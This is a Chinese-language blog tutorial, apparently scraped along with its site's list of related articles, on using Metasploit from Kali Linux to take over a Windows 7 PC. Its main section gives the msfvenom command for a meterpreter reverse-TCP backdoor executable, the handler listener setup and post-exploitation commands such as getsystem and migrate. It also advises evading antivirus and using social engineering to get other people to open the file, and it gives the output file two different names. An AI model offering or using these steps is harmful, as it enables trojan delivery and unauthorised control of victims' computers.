注:只是测试,不可干违法的事。

一、metaspolit工具的介绍

  • 1.1、metaspolit 是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。
  • 1.2、Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。
  • 1.3、Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠         平台
  • 1.4、这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操作生成器(nops)和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode          并且不断更新。

二、专业术语

  • 渗透测试(Exploit):指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。能够进行攻击并得到目标系统控制权的恶意代码。经典的exploit由payload和injector(注入程序)组成,payload负责取得系统的控制权,而注入程序负责将payload注射到相应的有漏洞的系统中;
  • 攻击载荷(Payload):是我们期望目标系统在被渗透攻击之后执行的代码。其实就是广义上的Shellcode,被翻译为‘有效载荷’
  • shellcode ::攻击程序的核心代码,能够取得系统的攻击权,一把是取得一个shell。是在渗透攻击时作为攻击载荷运行的一组机器指令,通常用汇编语言编写。injector:相对shellcode来说,它实现加载和发送shellcode,提供返回地址等功能;
  • 模块(Module):指Metaspolit框架中所使用的一段软件代码组件,可用于发起渗透攻击或者行某些辅助攻击。
    • auxiliary
    • encoders
    • exploits
    • nops
    • payloads
    • post 
  • 监听器(Listener):是metaspolit中用来等待网络连接的组件。

二、metaspolit工具的简单使用

三、小实验:利用metaspolit工具渗透win7电脑

流程如下:

1、使用工具:kail Linux 系统(IP:192.168.31.54)

       win7 系统(IP:192.168.31.136)

2、步骤:  

1、首先在kali上制作一个后门程序。文件名为:openme.exe

       命令:

            msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.54 LPORT=5050 -f exe -o setup.exe

            #本地监听地址及端口号:192.168.31.54:5050

    2、为生成的文件 openme.exe 赋予可执行的权限,如果有必要可以对该文件执行免杀

       命令:

            chmod 777 openme.exe

    3、打开msf,加载exploit/multi/handler模块,同时设置本地主机地址,本地端口

       命令:msfconsole

            msf > use exploit/multi/handler

            msf exploit(handler) > set lhost 192.168.31.54

            msf exploit(handler) > set lport 5050

    4、开始执行渗透攻击并监听

       命令:

            msf exploit(handler) > exploit -z -j

    5、此时,你可以将文件发给其他人,利用社会工程学知识让别人在他的win7系统上打开该文件,那么你的目的就达到了

    6、后门程序反向连接到msf,msf发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf)。

       如图你在你kali上会有一个session。你攻陷了别人的主机并拿到了shell,还有session信息。

       命令:

            msf exploit(handler) > sessions

            msf exploit(handler) > sessions -i 1

            meterpreter > shell

    7、入侵成功之后可操作win7电脑

        getsystem        #会自动利用各种各样的系统漏洞来进行权限提升

        migrate          #进程id进程迁移

        background       #把当前的会话设置为背景,需要的时候在启用

        getuid          #查看对方正在运行的用户

        ps   #列出所有的进程

        getpid      #返回运行meterpreter的id号

        sysinfo       #产看系统信息和体系结构

        shell    #切换到cmd的系统权限方式

3、运行结果截图

查看本地的IP

 

用msfvenom生成exe文件,并赋予权限

启动metaspolit

设置本地IP地址和端口并且攻击

当对方打开exe文件的时候,会生成一个session会话,如下图所示

现在就可以操作别人电脑了,如下图:

kail linux 系统下利用metaspolit工具渗透win7电脑的更多相关文章

  1. Linux系统下利用wget命令把整站下载做镜像网站

    Linux系统下利用wget命令把整站下载做镜像网站 2011-05-28 18:13:01 | 1次阅读 | 评论:0 条 | itokit  在linux下完整的用wget命令整站采集网站做镜像 ...

  2. 在 Linux 系统下使用 PhotoRec 工具来恢复已删除或丢失的文件

    PhotoRec – Recover Deleted or Lost Files in Linux 在 Linux 系统下使用 PhotoRec 工具来恢复已删除或丢失的文件 当你在系统中有意或无意地 ...

  3. Linux系统下C++开发工具-远程终端软件使用

    通过前面安装Linux系统介绍,紧接着进入搭建Linux开发环境的第二步,选择C++开发工具,以及必要的客户端软件.从而完整的搭建一个Linux下C++开发的环境,便于初学者在该环境下能够很好的学习. ...

  4. Linux系统下rz/sz工具的安装

    (1)编译安装 root 账号登陆后,依次执行以下命令: wget http://www.ohse.de/uwe/releases/lrzsz-0.12.20.tar.gz tar zxvf lrzs ...

  5. 在Linux系统下运行微信Web开发者工具

    微信Web开发者工具只有window版本和mac版本,如果想要在Linux系统下运行微信Web开发者工具,需要花费很大周折. 注:带 * 的步骤或文件为不确定是否管用的步骤或文件.本人系统为Linux ...

  6. LINUX系统下MySQL 压力测试工具super smack

    摘要:1.源文件下载地址:http://vegan.net/tony/supersmack/2.安装:注意在编译时,可以先把对应的libmysqlclient.so.*拷贝到/usr/lib3.测试: ...

  7. rsync Linux系统下的数据镜像备份工具

    rsync是Linux系统下的数据镜像备份工具,从软件的命名上就可以看出来了——remote sync.rsync支持大多数的类Unix系统,无论是Linux.Solaris还是BSD上都经过了良好的 ...

  8. [转]linux 系统监控、诊断工具之 IO wait

    1.问题: 最近在做日志的实时同步,上线之前是做过单份线上日志压力测试的,消息队列和客户端.本机都没问题,但是没想到上了第二份日志之后,问题来了: 集群中的某台机器 top 看到负载巨高,集群中的机器 ...

  9. 深入理解linux系统下proc文件系统内容

    深入理解linux系统下proc文件系统内容 内容摘要:Linux系统上的/proc目录是一种文件系统,即proc文件系统. Linux系统上的/proc目录是一种文件系统,即proc文件系统.与其它 ...

随机推荐

  1. Echart 仪表盘和柱形图

    我们来分布讲解: 1.首先编一写一个html,如下: <html> <body class=""> <div class="containe ...

  2. 用户从输入URL到看到网页发生了什么?

    一.在浏览器地址栏输入URL 二.浏览器查看缓存1.如果资源未缓存,发起新请求如果已缓存,检验是否处于有效期,资源处于有效期内直接提供给客户端,否则与服务器进行验证.2.检验有效期通常有两个HTTP头 ...

  3. ibatis中#和$如何当作字符使用?

      1.情景展示 在plsql中,可以正常执行 但是在ibatis的sqlMap文件中,报错信息如下: 2.原因分析 ibatis中 #.$ 是功能符号,用来取值的,当sql中出现这类字符时便会造成冲 ...

  4. 〖Android〗dropbear一些操作命令备忘

    相关命令行: # 启动dropbear后台运行 /data/local/tmp/dropbear \ -A -N android -I -C -G -p \ -R /data/local/tmp/au ...

  5. tablib.Dataset()操作exl类型数据之“类方法”研究

    #tablib.Dataset()操作exl类型数据之“类方法”研究 import tablib #初始化 data=tablib.Dataset() #设置列标题 data.headers=('na ...

  6. PAC Manager的重生: Asbru

    PAC Manager在2016年停更后, 在Ubuntu18.04上的各种bug就无人修复了. 我在Windows下对XShell是重度依赖, 而在Linux下没有其他更好的替代品. 在上一次安装1 ...

  7. Path画直线与弧线

    代码地址如下:http://www.demodashi.com/demo/14754.html 前言 之前讲过Paint和Canvas的基本使用,今天来介绍下Path的使用 涉及内容有: Path画直 ...

  8. 给Java程序员的几条建议

    对于Java程序猿学习的建议 这一部分其实也算是今天的重点,这一部分用来回答很多群里的朋友所问过的问题,那就是LZ你是如何学习Java的,能不能给点建议? 今天LZ是打算来点干货,因此咱们就不说一些学 ...

  9. javascript 的 jasmine 的測试语句

    首先建立环境场景: 一般三个文件夹 lib jasmine的系统文件存放文件夹 spec 写測试用例的文件夹 src 存放源码的文件夹(被測对象) specRunner.html 測试入口文件. 入口 ...

  10. Linux查看GPU使用情况

    watch -n 10 nvidia-smi 一.watch watch命令用来定时执行某个程序 二.nvidia-smi nvdia-smi是英伟达自带的GPU监控命令.